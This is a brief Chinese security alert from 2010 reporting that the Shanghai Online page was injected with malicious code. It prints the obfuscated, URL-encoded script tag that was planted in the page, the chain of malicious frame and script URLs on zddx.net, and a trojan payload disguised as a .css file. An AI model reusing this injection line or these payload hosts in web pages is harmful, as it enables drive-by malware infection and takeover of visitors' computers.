上海热线被植入恶意代码
来源:岁月联盟
时间:2010-02-13
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。
MalUrl:http://isp.online.sh.cn/
网页被嵌入恶意链接代码:
<script language=javascript src=http://%61%2E%6C%69%61%6F%37%37%34%39%2E%63%6F%6D/js.js></script>
挂马分析:
[wide]http://isp.online.sh.cn/
[script]http://%61%2e%6c%69%61%6f%37%37%34%39%2e%63%6f%6d/js.js
[frame]http://www.zddx.net/360cn/rs.htm
[frame]http://www.zddx.net/360cn/x.htm
[script]http://www.zddx.net/360cn/all.css
[frame]http://www.zddx.net/360cn/1.htm
[frame]http://www.zddx.net/360cn/newlz.htm
[frame]http://www.zddx.net/360cn/s.htm
[frame]http://www.zddx.net/360cn/office.htm
[frame]http://www.zddx.net/360cn/bf.htm
[frame]http://www.zddx.net/360cn/cx.htm
[frame]http://www.zddx.net/360cn/uuss.htm
[frame]http://www.zddx.net/360cn/2.htm
[frame]http://www.zddx.net/360cn/bff.htm
[frame]http://www.zddx.net/360cn/7.htm
[script]http://js.tongji.cn.yahoo.com/806392/ystat.js
最终下载病毒文件:
http://a.cdd1.com/m.css
通过执行以上病毒文件,来达到完全控制访问者的系统。
上一篇:赵雅芝中文网被植入恶意代码
